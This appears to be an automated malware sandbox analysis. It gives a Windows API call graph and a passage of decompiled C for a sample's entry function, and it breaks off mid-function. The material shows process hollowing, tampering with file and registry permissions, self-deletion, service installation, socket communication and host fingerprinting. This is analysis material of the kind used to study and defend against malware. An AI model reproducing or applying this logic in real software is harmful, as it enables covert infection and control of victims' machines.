15361->15362 15365 4070d5 15362->15365 15363 40719b RegEnumValueA 15364 4071af RegCloseKey 15363->15364 15363->15365 15364->15375 15365->15363 15367 4071d0 15365->15367 15381 40f1a5 lstrlenA 15365->15381 15368 407205 RegCloseKey 15367->15368 15369 407227 15367->15369 15368->15375 15370 4072b8 ___ascii_stricmp 15369->15370 15371 40728e RegCloseKey 15369->15371 15372 4072cd RegCloseKey 15370->15372 15373 4072dd 15370->15373 15371->15375 15372->15375 15374 407311 RegCloseKey 15373->15374 15377 407335 15373->15377 15374->15375 15375->14954 15376 4073d5 RegCloseKey 15378 4073e4 15376->15378 15377->15376 15379 40737e GetFileAttributesExA 15377->15379 15380 407397 15377->15380 15379->15380 15380->15376 15382 40f1c3 15381->15382 15382->15365 15384 403ee2 15383->15384 15385 403edc 15383->15385 15384->14960 15386 406dc2 6 API calls 15385->15386 15386->15384 15388 40400b CreateFileA 15387->15388 15389 40402c GetLastError 15388->15389 15390 404052 15388->15390 15389->15390 15391 404037 15389->15391 15390->14958 15390->14963 15390->14964 15391->15390 15392 404041 Sleep 15391->15392 15392->15388 15392->15390 15394 403f7c 15393->15394 15395 403f4e GetLastError 15393->15395 15397 403f8c ReadFile 15394->15397 15395->15394 15396 403f5b WaitForSingleObject GetOverlappedResult 15395->15396 15396->15394 15398 403ff0 15397->15398 15399 403fc2 GetLastError 15397->15399 15398->14969 15398->14970 15399->15398 15400 403fcf WaitForSingleObject GetOverlappedResult 15399->15400 15400->15398 15404 40eb74 15401->15404 15405 40eb7b GetProcessHeap HeapSize 15404->15405 15406 404350 15404->15406 15405->15406 15406->14977 15408 401924 GetVersionExA 15407->15408 15408->15021 15410 406eef AllocateAndInitializeSid 15409->15410 15416 406f55 15409->15416 15411 406f44 15410->15411 15412 406f1c CheckTokenMembership 15410->15412 15411->15416 15443 406e36 GetUserNameW 15411->15443 15413 406f3b FreeSid 15412->15413 15414 406f2e 15412->15414 15413->15411 15414->15413 15416->15030 15418 40920e 15417->15418 15421 409308 15417->15421 15419 4092f1 Sleep 15418->15419 15420 4092bf ShellExecuteA 15418->15420 15418->15421 15419->15418 15420->15418 15420->15421 15421->15048 15423 40ef32 15422->15423 15423->15045 15425 40f0f1 15424->15425 15426 40f0ed 15424->15426 15427 40f119 15425->15427 15428 40f0fa lstrlenA SysAllocStringByteLen 15425->15428 15426->15053 15429 40f11c MultiByteToWideChar 15427->15429 15428->15429 15430 40f117 15428->15430 15429->15430 15430->15053 15432 401820 17 API calls 15431->15432 15433 4018f2 15432->15433 15434 4018f9 15433->15434 15446 401280 15433->15446 15434->15048 15436 401908 15436->15048 15459 401000 15437->15459 15439 401839 15440 401851 GetCurrentProcess 15439->15440 15441 40183d 15439->15441 15442 401864 15440->15442 15441->15039 15442->15039 15444 406e5f LookupAccountNameW 15443->15444 15445 406e97 15443->15445 15444->15445 15445->15416 15449 4012e1 ShellExecuteExW 15446->15449 15448 4016f9 GetLastError 15450 401699 15448->15450 15449->15448 15456 4013a8 15449->15456 15450->15436 15451 401570 lstrlenW 15451->15456 15452 4015be GetStartupInfoW 15452->15456 15453 4015ff CreateProcessWithLogonW 15454 4016bf GetLastError 15453->15454 15455 40163f WaitForSingleObject 15453->15455 15454->15450 15455->15456 15457 401659 CloseHandle 15455->15457 15456->15450 15456->15451 15456->15452 15456->15453 15458 401668 CloseHandle 15456->15458 15457->15456 15458->15456 15460 40100d LoadLibraryA 15459->15460 15476 401023 15459->15476 15461 401021 15460->15461 15460->15476 15461->15439 15462 4010b5 GetProcAddress 15463 4010d1 GetProcAddress 15462->15463 15464 40127b 15462->15464 15463->15464 15465 4010f0 GetProcAddress 15463->15465 15464->15439 15465->15464 15466 401110 GetProcAddress 15465->15466 15466->15464 15467 401130 GetProcAddress 15466->15467 15467->15464 15468 40114f GetProcAddress 15467->15468 15468->15464 15469 40116f GetProcAddress 15468->15469 15469->15464 15470 40118f GetProcAddress 15469->15470 15470->15464 15471 4011ae GetProcAddress 15470->15471 15471->15464 15472 4011ce GetProcAddress 15471->15472 15472->15464 15473 4011ee GetProcAddress 15472->15473 15473->15464 15474 401209 GetProcAddress 15473->15474 15474->15464 15475 401225 GetProcAddress 15474->15475 15475->15464 15477 401241 GetProcAddress 15475->15477 15476->15462 15479 4010ae 15476->15479 15477->15464 15478 40125c GetProcAddress 15477->15478 15478->15464 15479->15439 15482 4069b9 WriteFile 15480->15482 15483 406a3c 15482->15483 15485 4069ff 15482->15485 15483->15063 15483->15064 15484 406a10 WriteFile 15484->15483 15484->15485 15485->15483 15485->15484 15487 40eb17 15486->15487 15488 40eb21 15486->15488 15490 40eae4 15487->15490 15488->15065 15491 40eb02 GetProcAddress 15490->15491 15492 40eaed LoadLibraryA 15490->15492 15491->15488 15492->15491 15493 40eb01 15492->15493 15493->15488 15495 40eba7 GetProcessHeap HeapSize 15494->15495 15496 40ebbf GetProcessHeap HeapFree 15494->15496 15495->15496 15496->15096 15498 40908d 15497->15498 15499 4090e2 wsprintfA 15498->15499 15500 40ee2a 15499->15500 15501 4090fd CreateFileA 15500->15501 15502 40911a lstrlenA WriteFile CloseHandle 15501->15502 15503 40913f 15501->15503 15502->15503 15503->15105 15503->15106 15505 40ee2a 15504->15505 15506 409794 CreateProcessA 15505->15506 15507 4097c2 15506->15507 15508 4097bb 15506->15508 15509 4097d4 GetThreadContext 15507->15509 15508->15117 15510 409801 15509->15510 15511 4097f5 15509->15511 15518 40637c 15510->15518 15512 4097f6 TerminateProcess 15511->15512 15512->15508 15514 409816 15514->15512 15515 40981e WriteProcessMemory 15514->15515 15515->15511 15516 40983b SetThreadContext 15515->15516 15516->15511 15517 409858 ResumeThread 15516->15517 15517->15508 15519 406386 15518->15519 15520 40638a GetModuleHandleA VirtualAlloc 15518->15520 15519->15514 15521 4063b6 15520->15521 15525 4063f5 15520->15525 15522 4063be VirtualAllocEx 15521->15522 15523 4063d6 15522->15523 15522->15525 15524 4063df WriteProcessMemory 15523->15524 15524->15525 15525->15514 15527 40dd41 InterlockedExchange 15526->15527 15528 40dd20 GetCurrentThreadId 15527->15528 15529 40dd4a 15527->15529 15530 40dd53 GetCurrentThreadId 15528->15530 15531 40dd2e GetTickCount 15528->15531 15529->15530 15530->15120 15531->15529 15532 40dd39 Sleep 15531->15532 15532->15527 15534 40dbf0 15533->15534 15566 40db67 GetEnvironmentVariableA 15534->15566 15536 40dc19 15537 40dcda 15536->15537 15538 40db67 3 API calls 15536->15538 15537->15122 15539 40dc5c 15538->15539 15539->15537 15540 40db67 3 API calls 15539->15540 15541 40dc9b 15540->15541 15541->15537 15542 40db67 3 API calls 15541->15542 15542->15537 15544 40db55 15543->15544 15545 40db3a 15543->15545 15544->15124 15544->15129 15570 40ebed 15545->15570 15579 40f04e SystemTimeToFileTime GetSystemTimeAsFileTime 15547->15579 15549 40e3be 15549->15124 15550 40e342 15550->15549 15582 40de24 15550->15582 15553 40e528 15552->15553 15554 40e3f4 15552->15554 15553->15132 15555 40e434 RegQueryValueExA 15554->15555 15556 40e458 15555->15556 15557 40e51d RegCloseKey 15555->15557 15558 40e46e RegQueryValueExA 15556->15558 15557->15553 15558->15556 15559 40e488 15558->15559 15559->15557 15560 40db2e 8 API calls 15559->15560 15561 40e499 15560->15561 15561->15557 15562 40e4b9 RegQueryValueExA 15561->15562 15563 40e4e8 15561->15563 15562->15561 15562->15563 15563->15557 15564 40e332 14 API calls 15563->15564 15565 40e513 15564->15565 15565->15557 15567 40dbca 15566->15567 15569 40db89 lstrcpyA CreateFileA 15566->15569 15567->15536 15569->15536 15571 40ec01 15570->15571 15572 40ebf6 15570->15572 15573 40eba0 codecvt 2 API calls 15571->15573 15574 40ebcc 4 API calls 15572->15574 15575 40ec0a GetProcessHeap HeapReAlloc 15573->15575 15576 40ebfe 15574->15576 15577 40eb74 2 API calls 15575->15577 15576->15544 15578 40ec28 15577->15578 15578->15544 15593 40eb41 15579->15593 15583 40de3a 15582->15583 15586 40de4e 15583->15586 15597 40dd84 15583->15597 15586->15550 15587 40de9e 15587->15586 15589 40ebed 8 API calls 15587->15589 15588 40de76 15601 40ddcf 15588->15601 15591 40def6 15589->15591 15591->15586 15592 40ddcf lstrcmpA 15591->15592 15592->15586 15594 40eb54 15593->15594 15595 40eb4a 15593->15595 15594->15550 15596 40eae4 2 API calls 15595->15596 15596->15594 15598 40ddc5 15597->15598 15599 40dd96 15597->15599 15598->15587 15598->15588 15599->15598 15600 40ddad lstrcmpiA 15599->15600 15600->15598 15600->15599 15602 40dddd 15601->15602 15604 40de20 15601->15604 15603 40ddfa lstrcmpA 15602->15603 15602->15604 15603->15602 15604->15586 15606 40dd05 6 API calls 15605->15606 15607 40e821 15606->15607 15608 40dd84 lstrcmpiA 15607->15608 15609 40e82c 15608->15609 15610 40e844 15609->15610 15653 402480 15609->15653 15610->15149 15613 40dd05 6 API calls 15612->15613 15614 40df7c 15613->15614 15615 40dd84 lstrcmpiA 15614->15615 15619 40df89 15615->15619 15616 40dfc4 15616->15154 15617 40ddcf lstrcmpA 15617->15619 15618 40ec2e codecvt 4 API calls 15618->15619 15619->15616 15619->15617 15619->15618 15620 40dd84 lstrcmpiA 15619->15620 15620->15619 15622 40ea98 15621->15622 15662 40e8a1 15622->15662 15624 401e84 15624->15157 15626 4019d5 GetProcAddress GetProcAddress GetProcAddress 15625->15626 15629 4019ce 15625->15629 15627 401ab3 FreeLibrary 15626->15627 15628 401a04 15626->15628 15627->15629 15628->15627 15630 401a14 GetProcessHeap 15628->15630 15629->15162 15630->15629 15632 401a2e HeapAlloc 15630->15632 15632->15629 15633 401a42 15632->15633 15634 401a52 HeapReAlloc 15633->15634 15636 401a62 15633->15636 15634->15636 15635 401aa1 FreeLibrary 15635->15629 15636->15635 15637 401a96 HeapFree 15636->15637 15637->15635 15690 401ac3 LoadLibraryA 15638->15690 15641 401bcf 15641->15173 15643 401ac3 12 API calls 15642->15643 15644 401c09 15643->15644 15645 401c41 15644->15645 15646 401c0d GetComputerNameA 15644->15646 15645->15181 15647 401c45 GetVolumeInformationA 15646->15647 15648 401c1f 15646->15648 15647->15645 15648->15645 15648->15647 15650 40ee2a 15649->15650 15651 4030d0 gethostname gethostbyname 15650->15651 15652 401f82 15651->15652 15652->15186 15652->15188 15656 402419 lstrlenA 15653->15656 15655 402491 15655->15610 15657 40243d lstrlenA 15656->15657 15660 402474 15656->15660 15658 402464 lstrlenA 15657->15658 15659 40244e lstrcmpiA 15657->15659 15658->15657 15658->15660 15659->15658 15661 40245c 15659->15661 15660->15655 15661->15658 15661->15660 15663 40dd05 6 API calls 15662->15663 15664 40e8b4 15663->15664 15665 40dd84 lstrcmpiA 15664->15665 15666 40e8c0 15665->15666 15667 40e90a 15666->15667 15668 40e8c8 lstrcpynA 15666->15668 15669 402419 4 API calls 15667->15669 15678 40ea27 15667->15678 15670 40e8f5 15668->15670 15671 40e926 lstrlenA lstrlenA 15669->15671 15683 40df4c 15670->15683 15673 40e96a 15671->15673 15674 40e94c lstrlenA 15671->15674 15677 40ebcc 4 API calls 15673->15677 15673->15678 15674->15673 15675 40e901 15676 40dd84 lstrcmpiA 15675->15676 15676->15667 15679 40e98f 15677->15679 15678->15624 15679->15678 15680 40df4c 20 API calls 15679->15680 15681 40ea1e 15680->15681 15682 40ec2e codecvt 4 API calls 15681->15682 15682->15678 15684 40dd05 6 API calls 15683->15684 15685 40df51 15684->15685 15686 40f04e 4 API calls 15685->15686 15687 40df58 15686->15687 15688 40de24 10 API calls 15687->15688 15689 40df63 15688->15689 15689->15675 15691 401ae2 GetProcAddress 15690->15691 15692 401b68 GetComputerNameA GetVolumeInformationA 15690->15692 15691->15692 15693 401af5 15691->15693 15692->15641 15694 40ebed 8 API calls 15693->15694 15695 401b29 15693->15695 15694->15693 15695->15692 15695->15695 15696 40ec2e codecvt 4 API calls 15695->15696 15696->15692 15698 406ec3 2 API calls 15697->15698 15699 407ef4 15698->15699 15700 4073ff 17 API calls 15699->15700 15709 407fc9 15699->15709 15701 407f16 15700->15701 15701->15709 15710 407809 GetUserNameA 15701->15710 15703 407f63 15704 40ef1e lstrlenA 15703->15704 15703->15709 15705 407fa6 15704->15705 15706 40ef1e lstrlenA 15705->15706 15707 407fb7 15706->15707 15734 407a95 RegOpenKeyExA 15707->15734 15709->15196 15711 40783d LookupAccountNameA 15710->15711 15712 407a8d 15710->15712 15711->15712 15713 407874 GetLengthSid GetFileSecurityA 15711->15713 15712->15703 15713->15712 15714 4078a8 GetSecurityDescriptorOwner 15713->15714 15715 4078c5 EqualSid 15714->15715 15716 40791d GetSecurityDescriptorDacl 15714->15716 15715->15716 15717 4078dc LocalAlloc 15715->15717 15716->15712 15722 407941 15716->15722 15717->15716 15718 4078ef InitializeSecurityDescriptor 15717->15718 15720 407916 LocalFree 15718->15720 15721 4078fb SetSecurityDescriptorOwner 15718->15721 15719 40795b GetAce 15719->15722 15720->15716 15721->15720 15723 40790b SetFileSecurityA 15721->15723 15722->15712 15722->15719 15724 407980 EqualSid 15722->15724 15725 407a3d 15722->15725 15726 4079be EqualSid 15722->15726 15727 40799d DeleteAce 15722->15727 15723->15720 15724->15722 15725->15712 15728 407a43 LocalAlloc 15725->15728 15726->15722 15727->15722 15728->15712 15729 407a56 InitializeSecurityDescriptor 15728->15729 15730 407a62 SetSecurityDescriptorDacl 15729->15730 15731 407a86 LocalFree 15729->15731 15730->15731 15732 407a73 SetFileSecurityA 15730->15732 15731->15712 15732->15731 15733 407a83 15732->15733 15733->15731 15735 407ac4 15734->15735 15736 407acb GetUserNameA 15734->15736 15735->15709 15737 407da7 RegCloseKey 15736->15737 15738 407aed LookupAccountNameA 15736->15738 15737->15735 15738->15737 15739 407b24 RegGetKeySecurity 15738->15739 15739->15737 15740 407b49 GetSecurityDescriptorOwner 15739->15740 15741 407b63 EqualSid 15740->15741 15742 407bb8 GetSecurityDescriptorDacl 15740->15742 15741->15742 15743 407b74 LocalAlloc 15741->15743 15744 407da6 15742->15744 15751 407bdc 15742->15751 15743->15742 15745 407b8a InitializeSecurityDescriptor 15743->15745 15744->15737 15747 407bb1 LocalFree 15745->15747 15748 407b96 SetSecurityDescriptorOwner 15745->15748 15746 407bf8 GetAce 15746->15751 15747->15742 15748->15747 15749 407ba6 RegSetKeySecurity 15748->15749 15749->15747 15750 407c1d EqualSid 15750->15751 15751->15744 15751->15746 15751->15750 15752 407cd9 15751->15752 15753 407c5f EqualSid 15751->15753 15754 407c3a DeleteAce 15751->15754 15752->15744 15755 407d5a LocalAlloc 15752->15755 15756 407cf2 RegOpenKeyExA 15752->15756 15753->15751 15754->15751 15755->15744 15757 407d70 InitializeSecurityDescriptor 15755->15757 15756->15755 15762 407d0f 15756->15762 15758 407d7c SetSecurityDescriptorDacl 15757->15758 15759 407d9f LocalFree 15757->15759 15758->15759 15760 407d8c RegSetKeySecurity 15758->15760 15759->15744 15760->15759 15761 407d9c 15760->15761 15761->15759 15763 407d43 RegSetValueExA 15762->15763 15763->15755 15764 407d54 15763->15764 15764->15755 15765->15216 15767 40dd05 6 API calls 15766->15767 15770 40e65f 15767->15770 15768 40e6a5 15769 40ebcc 4 API calls 15768->15769 15775 40e6f5 15768->15775 15772 40e6b0 15769->15772 15770->15768 15771 40e68c lstrcmpA 15770->15771 15771->15770 15773 40e6b7 15772->15773 15774 40e6e0 lstrcpynA 15772->15774 15772->15775 15773->15218 15774->15775 15775->15773 15776 40e71d lstrcmpA 15775->15776 15776->15775 15777->15224 15779 40c525 15778->15779 15780 40c532 15778->15780 15779->15780 15782 40ec2e codecvt 4 API calls 15779->15782 15781 40c548 15780->15781 15930 40e7ff 15780->15930 15784 40e7ff lstrcmpiA 15781->15784 15792 40c54f 15781->15792 15782->15780 15785 40c615 15784->15785 15786 40ebcc 4 API calls 15785->15786 15785->15792 15786->15792 15787 40c5d1 15790 40ebcc 4 API calls 15787->15790 15789 40e819 11 API calls 15791 40c5b7 15789->15791 15790->15792 15793 40f04e 4 API calls 15791->15793 15792->15237 15794 40c5bf 15793->15794 15794->15781 15794->15787 15796 402692 inet_addr 15795->15796 15797 40268e 15795->15797 15796->15797 15798 40269e gethostbyname 15796->15798 15799 40f428 15797->15799 15798->15797 15933 40f315 15799->15933 15804 40c8d2 15802->15804 15803 40c907 15803->15239 15804->15803 15805 40c517 23 API calls 15804->15805 15805->15803 15806 40f43e 15807 40f473 recv 15806->15807 15808 40f458 15807->15808 15809 40f47c 15807->15809 15808->15807 15808->15809 15809->15255 15811 40c670 15810->15811 15812 40c67d 15810->15812 15813 40ebcc 4 API calls 15811->15813 15814 40ebcc 4 API calls 15812->15814 15816 40c699 15812->15816 15813->15812 15814->15816 15815 40c6f3 15815->15268 15815->15297 15816->15815 15817 40c73c send 15816->15817 15817->15815 15819 40c770 15818->15819 15820 40c77d 15818->15820 15821 40ebcc 4 API calls 15819->15821 15822 40c799 15820->15822 15823 40ebcc 4 API calls 15820->15823 15821->15820 15824 40c7b5 15822->15824 15826 40ebcc 4 API calls 15822->15826 15823->15822 15825 40f43e recv 15824->15825 15827 40c7cb 15825->15827 15826->15824 15828 40f43e recv 15827->15828 15829 40c7d3 15827->15829 15828->15829 15829->15297 15946 407db7 15830->15946 15833 407e70 15835 407e96 15833->15835 15837 40f04e 4 API calls 15833->15837 15834 40f04e 4 API calls 15836 407e4c 15834->15836 15835->15297 15836->15833 15838 40f04e 4 API calls 15836->15838 15837->15835 15838->15833 15840 406ec3 2 API calls 15839->15840 15841 407fdd 15840->15841 15842 4080c2 CreateProcessA 15841->15842 15843 4073ff 17 API calls 15841->15843 15842->15320 15842->15321 15844 407fff 15843->15844 15844->15842 15845 407809 21 API calls 15844->15845 15846 40804d 15845->15846 15846->15842 15847 40ef1e lstrlenA 15846->15847 15848 40809e 15847->15848 15849 40ef1e lstrlenA 15848->15849 15850 4080af 15849->15850 15851 407a95 24 API calls 15850->15851 15851->15842 15853 407db7 2 API calls 15852->15853 15854 407eb8 15853->15854 15855 40f04e 4 API calls 15854->15855 15856 407ece DeleteFileA 15855->15856 15856->15297 15858 40dd05 6 API calls 15857->15858 15859 40e31d 15858->15859 15950 40e177 15859->15950 15861 40e326 15861->15293 15863 4031f3 15862->15863 15873 4031ec 15862->15873 15864 40ebcc 4 API calls 15863->15864 15878 4031fc 15864->15878 15865 40344b 15866 403459 15865->15866 15867 40349d 15865->15867 15869 40f04e 4 API calls 15866->15869 15868 40ec2e codecvt 4 API calls 15867->15868 15868->15873 15870 40345f 15869->15870 15871 4030fa 4 API calls 15870->15871 15871->15873 15872 40ebcc GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 15872->15878 15873->15297 15874 40344d 15875 40ec2e codecvt 4 API calls 15874->15875 15875->15865 15877 403141 lstrcmpiA 15877->15878 15878->15865 15878->15872 15878->15873 15878->15874 15878->15877 15976 4030fa GetTickCount 15878->15976 15880 4030fa 4 API calls 15879->15880 15881 403c1a 15880->15881 15885 403ce6 15881->15885 15981 403a72 15881->15981 15884 403a72 9 API calls 15888 403c5e 15884->15888 15885->15297 15886 403a72 9 API calls 15886->15888 15887 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15887->15888 15888->15885 15888->15886 15888->15887 15890 403a10 15889->15890 15891 4030fa 4 API calls 15890->15891 15892 403a1a 15891->15892 15892->15297 15894 40dd05 6 API calls 15893->15894 15895 40e7be 15894->15895 15895->15297 15897 40c105 15896->15897 15898 40c07e wsprintfA 15896->15898 15897->15297 15990 40bfce GetTickCount wsprintfA 15898->15990 15900 40c0ef 15991 40bfce GetTickCount wsprintfA 15900->15991 15903 407047 15902->15903 15904 406f88 LookupAccountNameA 15902->15904 15903->15297 15906 407025 15904->15906 15907 406fcb 15904->15907 15908 406edd 5 API calls 15906->15908 15910 406fdb ConvertSidToStringSidA 15907->15910 15909 40702a wsprintfA 15908->15909 15909->15903 15910->15906 15911 406ff1 15910->15911 15912 407013 LocalFree 15911->15912 15912->15906 15914 40dd05 6 API calls 15913->15914 15915 40e85c 15914->15915 15916 40dd84 lstrcmpiA 15915->15916 15917 40e867 15916->15917 15918 40e885 lstrcpyA 15917->15918 15992 4024a5 15917->15992 15995 40dd69 15918->15995 15924 407db7 2 API calls 15923->15924 15925 407de1 15924->15925 15926 40f04e 4 API calls 15925->15926 15929 407e16 15925->15929 15927 407df2 15926->15927 15928 40f04e 4 API calls 15927->15928 15927->15929 15928->15929 15929->15297 15931 40dd84 lstrcmpiA 15930->15931 15932 40c58e 15931->15932 15932->15781 15932->15787 15932->15789 15934 40f33b 15933->15934 15941 40ca1d 15933->15941 15935 40f347 htons socket 15934->15935 15936 40f382 ioctlsocket 15935->15936 15937 40f374 closesocket 15935->15937 15938 40f3aa connect select 15936->15938 15939 40f39d 15936->15939 15937->15941 15938->15941 15942 40f3f2 __WSAFDIsSet 15938->15942 15940 40f39f closesocket 15939->15940 15940->15941 15941->15252 15941->15806 15942->15940 15943 40f403 ioctlsocket 15942->15943 15945 40f26d setsockopt setsockopt setsockopt setsockopt setsockopt 15943->15945 15945->15941 15947 407dc8 InterlockedExchange 15946->15947 15948 407dc0 Sleep 15947->15948 15949 407dd4 15947->15949 15948->15947 15949->15833 15949->15834 15951 40e184 15950->15951 15952 40e2e4 15951->15952 15953 40e223 15951->15953 15966 40dfe2 15951->15966 15952->15861 15953->15952 15955 40dfe2 8 API calls 15953->15955 15959 40e23c 15955->15959 15956 40e1be 15956->15953 15957 40dbcf 3 API calls 15956->15957 15960 40e1d6 15957->15960 15958 40e21a CloseHandle 15958->15953 15959->15952 15970 40e095 RegCreateKeyExA 15959->15970 15960->15953 15960->15958 15961 40e1f9 WriteFile 15960->15961 15961->15958 15962 40e213 15961->15962 15962->15958 15964 40e2a3 15964->15952 15965 40e095 4 API calls 15964->15965 15965->15952 15967 40dffc 15966->15967 15969 40e024 15966->15969 15968 40db2e 8 API calls 15967->15968 15967->15969 15968->15969 15969->15956 15971 40e172 15970->15971 15974 40e0c0 15970->15974 15971->15964 15972 40e14e RegDeleteValueA RegCloseKey 15972->15971 15973 40e115 RegSetValueExA 15973->15974 15975 40e13d 15973->15975 15974->15973 15974->15975 15975->15972 15977 403122 InterlockedExchange 15976->15977 15978 40312e 15977->15978 15979 40310f GetTickCount 15977->15979 15978->15878 15979->15978 15980 40311a Sleep 15979->15980 15980->15977 15982 40f04e 4 API calls 15981->15982 15989 403a83 15982->15989 15983 403ac1 15983->15884 15983->15885 15984 403be6 15985 40ec2e codecvt 4 API calls 15984->15985 15985->15983 15986 403bc0 15986->15984 15988 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15986->15988 15987 403b66 lstrlenA 15987->15983 15987->15989 15988->15986 15989->15983 15989->15986 15989->15987 15990->15900 15991->15897 15993 402419 4 API calls 15992->15993 15994 4024b6 15993->15994 15994->15918 15996 40dd79 lstrlenA 15995->15996 15996->15297 14811 7b96fc 14814 7b9704 14811->14814 14815 7b9713 14814->14815 14818 7b9ea4 14815->14818 14819 7b9ebf 14818->14819 14820 7b9ec8 CreateToolhelp32Snapshot 14819->14820 14821 7b9ee4 Module32First 14819->14821 14820->14819 14820->14821 14822 7b9703 14821->14822 14823 7b9ef3 14821->14823 14825 7b9b63 14823->14825 14826 7b9b8e 14825->14826 14827 7b9b9f VirtualAlloc 14826->14827 14828 7b9bd7 14826->14828 14827->14828

                                                                                Executed Functions

                                                                                Function 00409A6B Relevance: 98.8, APIs: 48, Strings: 8, Instructions: 799stringsleepregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 89%
                                                                                			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00406511); // executed
				E0040EC54(); // executed
				_t475 =  *0x41201f; // 0x0
				if(_t475 != 0) {
					__eflags =  *0x4133d8;
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0040405E, 0, 0, 0);
						__imp__#115(0x1010,  &_v1672);
						E0040E52E(_t449, __eflags);
						E0040EAAF(1, 0);
						E00401D96(_t438, 0x412118);
						E004080C9(_t438);
						CreateThread(0, 0, E0040877E, 0, 0, 0);
						E00405E6C(__eflags);
						E00403132();
						E0040C125(__eflags);
						E00408DB1(_t438);
						Sleep(0xbb8);
						E0040C4EE();
						while(1) {
							__eflags =  *0x4133d0;
							if( *0x4133d0 == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x4133d0 - 0x109a0;
							if(_t239 -  *0x4133d0 < 0x109a0) {
								L131:
								Sleep(0x1a90);
								continue;
							}
							L129:
							_t238 = E0040C913();
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x4133d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x4133d8);
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0040EF00( &_v672,  &_v671);
						_t436 = E0040ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x4122f8;
					_a12 = _t248;
					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0040EF00(0x4121a8,  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
								E0040EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00406EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E004098F2(_t438);
										L19:
										ExitProcess(0); // executed
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x4133b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00409961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64);
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0040EF00(0x4133b0,  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0040ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0040EE08(0x412184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x412184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
